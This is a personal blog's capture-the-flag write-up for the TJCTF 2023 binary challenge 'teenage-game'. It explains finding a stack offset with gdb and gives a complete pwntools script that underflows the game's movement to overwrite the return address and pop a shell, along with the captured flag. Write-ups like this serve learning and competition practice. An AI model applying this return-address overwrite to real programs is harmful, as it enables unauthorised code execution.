HyggeHalcyon
GithubLinkedIn
  • 🕊️whoami
  • 🚩CTFs
    • 2025
      • ARKAVIDIA Quals
      • TECHOMFEST Quals
    • 2024
      • BackdoorCTF
      • World Wide CTF
      • 7th Cyber Mimic Defense
      • TSA Cyber Champion
      • Cyber Jawara International
      • National Cyber Week Quals
      • COMPFEST 16 Finals
      • HackToday Finals
      • UIUCTF
      • TBTL CTF
      • BSidesSF CTF
      • UMD CTF
      • UMassCTF
      • b01lers CTF
      • AmateursCTF
      • UNbreakable International - Team Phase
    • 2023
      • HackToday CTF Quals
        • Vnote
        • TahuBulat
        • Rangkaian Digital
      • Tenable CTF
        • Skiddyana Pwnz and the Loom of Fate
        • Braggart
      • CiGITS
        • afafafaf
        • popping around shell
        • well_known
      • TJCTF
        • flip out
        • shelly
        • groppling-hook
        • formatter
        • teenage-game
      • SanDiegoCTF
        • money printer
        • turtle shell
      • DeadSec CTF
        • one punch
      • FindIT CTF Quals
        • Debugging Spiders
        • Everything Machine
        • Furr(y)verse
        • Bypass the Py
        • Joy Sketching in the Matrix
        • Detective Handal
        • I Like Matrix
        • CRYptograPI
        • Date Night
        • Web-Find IT
        • Mental Health Check
        • NCS Cipher
        • Discovered
  • 🔍NOTES
    • FSOP
      • Structures
      • GDB
      • Arbitrary Read/Write
      • Vtable Hijack
    • Heap Feng Shui
      • Libc Leak
    • Kernel Space
      • Privilege Escalation
      • Objects
      • Escaping Seccomp
    • V8
      • Documentation
      • TurboFan
      • SandBox (Ubercage)
  • 📚Resources
    • Cyber Security
      • General
      • Red Teaming
        • CheatSheet
        • Payload Database
        • Quality of Life
      • Binary Exploitation
        • Return Oriented Programming
        • File Structure Oriented Programming
        • Heap Exploitation
        • Linux Kernel Exploitation
        • Windows Exploitation
        • V8 Browser
      • Reverse Engineering
        • Windows Executable
        • Malware Analysis
        • Tools
      • Web Exploitation
      • Malware Development
      • Detection Engineering
      • Blockchain / Web3
      • Cryptography
    • Software Engineering
  • 📋Planning
    • Quick Notes
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag
  1. CTFs
  2. 2023
  3. TJCTF

teenage-game

PreviousformatterNextSanDiegoCTF

Last updated 1 year ago

Problem

Description

give me a string, any string!

nc tjc.tf 31764

Solution

This challenge is the exact same as babygame02 in picoCTF 2023 with some improvements in the new features and better experiences when comes into playing the game. The solution however is exactly the same and there's other people who explained it better than me, go refer to this link for the full in-depth explanation towards the exploit we're about to do

what I will cover however is how do we determine the offset of our player tile and the RIP. Boot up gdb, move our player tile the coordinate of (0, 0) and Ctrl+C to inspect the stack alignment.

we see that our player tile is located at 0x7fffffffd2b0 and the return to main is located at 0x7fffffffd298. Although the address may be dynamic, their offset towards each other is the same. Thus we can calculate the offset to determine how many time we should move.

Thus 24 is our offset

exploit.py
#!usr/bin/python3
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './game'
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'info'
host = 'tjc.tf'
port = 31119

def start(argv=[]):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
init-pwndbg
break *win
'''.format(**locals())

# =========================================================
#                         EXPLOITS
# =========================================================
# reference: https://blog.ry4n.org/babygame02-picoctf-writeup-6bf57b54f7b3
io = start()

# set player tile to last byte of win()
io.send(b'l')
io.send(b'\xe4')

# set coordinate to (0, 0)
for i in range(4):
    io.send(b'w')
    io.send(b'a')

# overwriting RIP
io.send(b'w')
for i in range(24):
    io.send(b'a')
io.send(b's')

# got shell
io.interactive()

Flag

tjctf{so_many_new_features_but_who_will_stop_the_underflow?_47c6f204377cb18b30e68da46e9930dc}

🚩
babygame02 picoCTF writeupMedium
stack alignment
calculating offset
Logo